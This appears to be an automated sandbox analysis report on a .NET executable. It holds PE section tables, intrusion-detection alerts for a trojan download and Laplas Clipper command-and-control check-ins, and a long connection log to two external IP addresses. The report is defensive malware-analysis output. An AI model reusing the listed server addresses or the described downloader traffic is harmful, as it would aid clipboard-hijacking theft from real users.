add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6110 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x56c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x4164 | 0x4200 | eccf20ea112bf438be683fa0cf166e8a | False | 0.35102982954545453 | data | 4.256724512349862 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x8000 | 0x56c | 0x600 | ea3c12d2167505e92592d2bdc186595f | False | 0.3984375 | data | 4.19455785120341 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa000 | 0xc | 0x200 | 0445df288dec4d312cb0239a7b5a13d3 | False | 0.044921875 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x80a0 | 0x234 | data | | | 0.46808510638297873
RT_MANIFEST | 0x82d4 | 0x298 | XML 1.0 document, ASCII text | | | 0.46536144578313254
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-04T19:13:18.950746+0200 | 2018581 | ET MALWARE Single char EXE direct download likely trojan (multiple families) | 1 | 192.168.2.4 | 49730 | 185.166.143.49 | 443 | TCP
2024-10-04T19:13:20.612319+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49731 | 185.166.143.49 | 443 | TCP
2024-10-04T19:13:22.132122+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49732 | 185.166.143.49 | 443 | TCP
2024-10-04T19:13:59.781016+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49739 | 45.159.189.105 | 80 | TCP
2024-10-04T19:13:59.781016+0200 | 2039775 | ET MALWARE Laplas Clipper - Regex CnC Request | 1 | 192.168.2.4 | 49739 | 45.159.189.105 | 80 | TCP
2024-10-04T19:14:01.488048+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49740 | 45.159.189.105 | 80 | TCP
2024-10-04T19:14:01.488048+0200 | 2039776 | ET MALWARE Laplas Clipper - SetOnline CnC Checkin | 1 | 192.168.2.4 | 49740 | 45.159.189.105 | 80 | TCP
2024-10-04T19:14:57.437285+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 50007 | 45.159.189.105 | 80 | TCP
2024-10-04T19:14:57.437285+0200 | 2039775 | ET MALWARE Laplas Clipper - Regex CnC Request | 1 | 192.168.2.4 | 50007 | 45.159.189.105 | 80 | TCP
2024-10-04T19:14:59.158697+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 50008 | 45.159.189.105 | 80 | TCP
2024-10-04T19:14:59.158697+0200 | 2039776 | ET MALWARE Laplas Clipper - SetOnline CnC Checkin | 1 | 192.168.2.4 | 50008 | 45.159.189.105 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 4, 2024 19:13:17.789968014 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:17.789997101 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:17.790060043 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:17.800522089 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:17.800551891 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:18.553272963 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:18.553345919 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:18.557543993 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:18.557571888 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:18.558074951 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:18.569608927 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:18.611413956 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:18.950452089 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:18.950514078 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:18.950545073 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:18.950563908 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:18.950583935 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:18.950588942 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:18.950602055 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:18.950638056 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:18.950639963 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:18.950686932 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.033735991 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.033798933 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.033834934 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.033865929 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.033888102 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.033902884 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.037456989 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.037523031 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.037547112 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.037554026 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.037585974 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.037600040 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.119699955 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.119750023 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.119800091 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.119818926 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.119837999 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.119848013 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.119851112 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.119882107 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.119899988 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.120528936 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.120582104 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:19.120603085 CEST | 49730 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:19.120611906 CEST | 443 | 49730 | 185.166.143.49 | 192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.120635986 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.120714903 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.121292114 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.121339083 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.121356964 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.121365070 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.121390104 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.176021099 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.205990076 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206012964 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206059933 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.206073046 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206101894 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.206115961 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.206516981 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206542969 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206607103 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.206615925 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206679106 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.207271099 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.207290888 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.207324982 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.207331896 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.207359076 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.207376957 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.207767963 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.207787037 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.207839012 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.207849026 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208034992 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.208369017 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208388090 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208422899 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.208429098 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208473921 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.208479881 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208491087 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208535910 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.219837904 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.219863892 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.246108055 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.246155977 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.246251106 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.246627092 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.246643066 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.888947010 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.899128914 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.899157047 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.612261057 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.612282991 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.612302065 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.612329006 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.612350941 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.612365961 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.612396002 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.613857031 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.613882065 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.613920927 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.613926888 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.613955021 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.613970995 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.617541075 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.617559910 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.617628098 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.617645979 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.617667913 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.619852066 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.619877100 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.619913101 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.619927883 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.619949102 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.622330904 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.622348070 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.622399092 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.622415066 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.622428894 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.623868942 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.623891115 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.623933077 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.623945951 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.623961926 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.676014900 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.676347971 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.676376104 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.676415920 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.676428080 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.676444054 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.676469088 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.676996946 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677025080 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677047014 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.677057028 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677078962 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.677098036 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.677620888 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677644014 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677691936 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.677705050 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677741051 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.678232908 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.678256989 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.678287983 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.678297997 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.678322077 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.678355932 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.679605007 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.679625034 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.679678917 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.679689884 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.679719925 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.679729939 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.682084084 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.682102919 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.682157040 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.682164907 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.682183981 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.682216883 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.683940887 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.683959961 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.684000969 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.684007883 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.684040070 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.684048891 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.763582945 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.763611078 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.763662100 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.763693094 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.763711929 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.763740063 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.763997078 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764015913 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764058113 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.764064074 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764077902 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.764117956 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.764580965 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764609098 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764668941 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.764674902 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764709949 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.764729977 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.765284061 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.765305042 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.765351057 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.765358925 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.765373945 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.765399933 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.765983105 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.766009092 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.766067028 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.766074896 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.766108036 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.766120911 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.766151905 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.768444061 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.844315052 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.844352007 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.844418049 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.844629049 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.844640970 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:21.585411072 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:21.586524963 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:21.586555958 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.131923914 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.131951094 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.131975889 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.132205963 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.132205963 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.766511917 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.766540051 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.766576052 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.766602993 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.766614914 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.766640902 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.767045975 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.767066956 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.767095089 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.767102003 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.767129898 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.767148972 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.767719030 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.767739058 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.767771959 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.767776966 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.767791033 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.767808914 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.768582106 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.768601894 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.768627882 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.768634081 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.768656969 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.768672943 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.769090891 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.769109964 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.769140005 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.769144058 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.769165993 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.769177914 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.769985914 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.770004034 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.770035028 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.770039082 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:22.770065069 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.770081043 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:22.770663023 CEST44349732185.166.143.49192.168.2.4
